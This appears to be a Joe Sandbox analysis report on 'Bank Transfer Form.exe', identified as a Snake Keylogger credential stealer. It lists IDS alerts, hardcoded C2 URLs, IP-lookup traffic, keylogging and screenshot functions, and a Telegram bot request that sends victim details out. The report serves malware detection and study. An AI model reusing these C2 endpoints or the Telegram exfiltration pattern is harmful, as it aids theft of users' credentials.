Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3E959h	3_2_06F3E6B0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F30673
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3E0A9h	3_2_06F3DE00
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3F209h	3_2_06F3EF60
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3CF49h	3_2_06F3CCA0
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F331E0h	3_2_06F32DBE
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3D7F9h	3_2_06F3D550
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3E501h	3_2_06F3E258
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3F661h	3_2_06F3F3B8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3EDB1h	3_2_06F3EB08
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3D3A1h	3_2_06F3D0F8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F30853
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06F30040
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3FAB9h	3_2_06F3F810
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F3DC51h	3_2_06F3D9A8
Source: C:\Users\user\Desktop\Bank Transfer Form.exe	Code function: 4x nop then jmp 06F331E0h	3_2_06F3310E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49753 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2019/02/2025%20/%2020:29:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2019/02/2025%20/%2020:29:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 13:44:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Bank Transfer Form.exe, 00000000.00000002.1712733368.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Bank Transfer Form.exe	String found in binary or memory: http://tempuri.org/DataTableUsers.xsd
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003446000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003437000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.00000000032FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004505000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004553000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004629000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043B2000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004604000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000433D000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000450C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004505000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004553000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004629000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004368000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000043B2000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.0000000004604000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000433D000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4142924007.000000000450C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003477000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
